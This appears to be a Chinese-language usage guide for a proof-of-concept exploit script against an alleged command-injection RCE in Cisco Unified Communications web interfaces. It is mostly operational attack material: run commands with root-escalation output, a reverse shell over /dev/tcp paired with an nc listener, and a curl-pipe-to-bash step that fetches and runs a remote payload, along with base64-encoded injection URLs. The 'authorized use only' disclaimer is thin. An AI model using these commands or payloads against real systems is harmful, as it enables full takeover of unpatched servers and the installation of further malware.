
一个影响多个 Cisco Unified Communications 产品的 严重远程代码执行(RCE) 漏洞。在补丁发布之前,该漏洞已在野外被积极利用。
这意味着攻击者可以远程完全接管受影响的系统。
这里是一份精心整理的指南,包含 使用示例,用于运行 PoC 脚本,包括 如果漏洞利用在存在漏洞的 Cisco Unified Communications 目标(未修补的 Web 界面暴露)上成功,你在终端中会看到的确切内容。我添加了一些表情符号、彩色代码块(通过 markdown)和结构化章节,以提高可读性。😎
此命令运行简单命令以获取用户 ID、用户名和系统详细信息。
命令:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
如果成功你会看到的内容(成功输出):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 关键标志:绿色 [+] 指示符、HTTP 200 状态以及输出块中的命令结果。如果没有显示输出但状态为 200,则说明它仍然静默成功了!
这会向你的机器生成一个交互式 shell。首先,启动一个监听器:nc -lvnp 4444。
命令:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
如果成功你会看到的内容(在脚本终端中):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
你在监听器(nc)终端中会看到的内容:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 关键标志:脚本显示成功消息;监听器立即获得 root shell 提示符。在那里输入命令进行交互!
这会从你的服务器下载并运行一个脚本。
命令:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
如果成功你会看到的内容(成功输出):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 关键标志:200 状态码;在目标上验证(例如,检查日志/文件)或在你的服务器上验证(下载日志)。如果 payload 是静默的,则没有直接输出。
💡 专业提示:
sudo 运行。HTTP 管理接口中对用户提供的输入验证不当,导致 命令注入,进而引发远程代码执行。
所有 PoC 代码仅用于在授权系统上进行道德、教育用途。未经授权的利用是非法的;对滥用行为不承担任何责任。😈